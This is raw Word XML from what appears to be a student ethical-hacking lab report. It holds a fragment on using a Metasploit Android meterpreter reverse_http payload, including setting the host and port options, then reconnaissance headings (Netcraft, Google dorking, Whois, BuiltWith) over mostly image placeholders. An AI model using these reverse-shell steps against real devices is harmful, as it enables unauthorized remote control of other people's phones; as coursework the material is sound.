        </w:rPr>
        <w:t xml:space="preserve">. We set the payload by the command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set payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since i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roid device it will b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>android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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA5507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EA5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reverse_htt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After we see the options we have to set the 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RHOSTS, LPORT </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5507">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOS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C053FE" w14:textId="07082F45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this we run and the android device is exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE68BD" w14:textId="77777777" w:rsidR="008072B3" w:rsidRDefault="008072B3" w:rsidP="002E272C">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F0C419" w14:textId="5994DA46" w:rsid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42C2008" wp14:editId="4265E665">
            <wp:extent cx="1670069" cy="1656484"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="19860041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48021" r="71004" b="569"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1670992" cy="1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4CFD" w14:textId="77777777" w:rsidR="008072B3" w:rsidRDefault="008072B3" w:rsidP="002E272C">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E869170" w14:textId="0A82C51B" w:rsidR="008072B3" w:rsidRPr="008072B3" w:rsidRDefault="008072B3" w:rsidP="002E272C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00D653" wp14:editId="647C2ACC">
            <wp:extent cx="3086759" cy="2380634"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="169011646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3061" r="45978" b="13084"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3087231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51DC" w14:textId="77777777" w:rsidR="00EA5507" w:rsidRDefault="00EA5507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5580A99" w14:textId="42D70F22" w:rsidR="008072B3" w:rsidRPr="00244EB6" w:rsidRDefault="008072B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2. Perform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footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 and reconnaissance using following websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3FFBFE" w14:textId="6B28A86F" w:rsidR="00EC5CC6" w:rsidRDefault="008072B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a)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Netkraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="144A6D77" w14:textId="4C5D67FB" w:rsidR="00CE2612" w:rsidRDefault="00CE2612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47304635" wp14:editId="5B4F9E16">
            <wp:extent cx="3748135" cy="1932305"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="88858593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r="1938" b="5451"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3762898" cy="19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2872" w14:textId="4B0B9658" w:rsidR="00CE2612" w:rsidRDefault="00CE2612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1693997E" wp14:editId="27E80EC6">
            <wp:extent cx="3747770" cy="1941830"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="13477672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r="2714" b="5995"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3764843" cy="19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5B1E" w14:textId="77777777" w:rsidR="00CE2612" w:rsidRDefault="00CE2612" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366AF6EE" w14:textId="160425D8" w:rsidR="00CE2612" w:rsidRDefault="00CE2612" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D29DDE" w14:textId="042A5461" w:rsidR="008072B3" w:rsidRPr="00244EB6" w:rsidRDefault="00CE2612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b) Google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dorking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A0B1B58" w14:textId="0FD9BC7B" w:rsidR="00495340" w:rsidRDefault="00F30973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0ABD410A" wp14:editId="38AE3FFE">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21334854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7FEB" w14:textId="3FF2936A" w:rsidR="00F30973" w:rsidRDefault="00F30973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21067DFB" wp14:editId="03E47603">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="108765001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C5F" w14:textId="17EC09F8" w:rsidR="00495340" w:rsidRDefault="00F30973" w:rsidP="008072B3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7B706841" wp14:editId="7F4D99AC">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="129280086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C00A" w14:textId="0B16E5A0" w:rsidR="00495340" w:rsidRDefault="00495340" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0873E220" w14:textId="2CA5E084" w:rsidR="00495340" w:rsidRPr="00495340" w:rsidRDefault="00495340" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00495340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>c) Whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F62816" w14:textId="6FD9D38D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2C1A05" wp14:editId="5B4E8F3C">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11754764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B180" w14:textId="4C8D189E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9A7CCA1" wp14:editId="7918EEC6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210717780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3472" w14:textId="33B65E71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3F0B4D1" wp14:editId="2E9560FC">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21137544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BD4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0C1F92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89EF9EC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D5086D2" w14:textId="77777777" w:rsidR="00F30973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651E60C" w14:textId="75E6AB8F" w:rsidR="00F30973" w:rsidRPr="00244EB6" w:rsidRDefault="00F30973" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">d) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Builtwith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CA9938C" w14:textId="1396FA45" w:rsidR="00495340" w:rsidRDefault="00F30973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B93DBF3" wp14:editId="7FC79F73">
            <wp:extent cx="5731510" cy="2753995"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="6893579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F392" w14:textId="77777777" w:rsidR="00495340" w:rsidRPr="00CE2612" w:rsidRDefault="00495340" w:rsidP="008072B3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4293A95" w14:textId="18F8A7B8" w:rsidR="00436723" w:rsidRDefault="00436723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bookmarkEnd w:id="1"/>
    <w:p w14:paraId="7B52420B" w14:textId="77777777" w:rsidR="00EC5CC6" w:rsidRPr="002E272C" w:rsidRDefault="00EC5CC6" w:rsidP="002E272C">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EC5CC6" w:rsidRPr="002E272C" w:rsidSect="00F860E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0E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="753ACC12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69DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DE40ACA"/>
    <w:lvl w:ilvl="0" w:tplc="05168A40">
      <w:start w:val="5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CA63B75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43B271F6"/>
    <w:lvl w:ilvl="0" w:tplc="FB3E285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1E9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82C2E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2122"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D4098B8"/>
    <w:lvl w:ilvl="0" w:tplc="F7C61F3A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1490">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="371922938">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1027949071">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="248930138">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="9787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A"/>
    <w:rsid w:val="00010E89"/>
    <w:rsid w:val="00084D05"/>
    <w:rsid w:val="00097CB4"/>
    <w:rsid w:val="0016470B"/>
    <w:rsid w:val="001C258F"/>
    <w:rsid w:val="001E6B80"/>
    <w:rsid w:val="00244EB6"/>
    <w:rsid w:val="002E272C"/>
    <w:rsid w:val="003013E9"/>
    <w:rsid w:val="00330393"/>
    <w:rsid w:val="004032A2"/>
    <w:rsid w:val="00436723"/>
    <w:rsid w:val="00495340"/>
    <w:rsid w:val="004A4454"/>
    <w:rsid w:val="004D1BD0"/>
    <w:rsid w:val="005207BD"/>
    <w:rsid w:val="00541E37"/>
    <w:rsid w:val="00542EEA"/>
    <w:rsid w:val="00592A9D"/>
    <w:rsid w:val="00615734"/>
    <w:rsid w:val="00654C64"/>
    <w:rsid w:val="00692915"/>
    <w:rsid w:val="0072357E"/>
    <w:rsid w:val="00727F0C"/>
    <w:rsid w:val="007523A3"/>
    <w:rsid w:val="007B4D5F"/>
    <w:rsid w:val="007C2C4B"/>
    <w:rsid w:val="008072B3"/>
    <w:rsid w:val="008955CF"/>
    <w:rsid w:val="00A77F20"/>
    <w:rsid w:val="00B52C16"/>
    <w:rsid w:val="00B52E56"/>
    <w:rsid w:val="00BA4D50"/>
    <w:rsid w:val="00BC46B2"/>
    <w:rsid w:val="00BD79F2"/>
    <w:rsid w:val="00CE2612"/>
    <w:rsid w:val="00D6161A"/>
    <w:rsid w:val="00E70875"/>
    <w:rsid w:val="00EA33BC"/>
    <w:rsid w:val="00EA5507"/>
    <w:rsid w:val="00EC5CC6"/>
    <w:rsid w:val="00F30973"/>
    <w:rsid w:val="00F61CEC"/>
    <w:rsid w:val="00F860EF"/>
    <w:rsid w:val="00F96115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FF44"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{48B3CF68-C545-45DB-AC68-B37BE46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96C2-89A9-4AA8-9197-A21C15DB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onam</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>shweta sonam</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-04T14:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-04T14:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>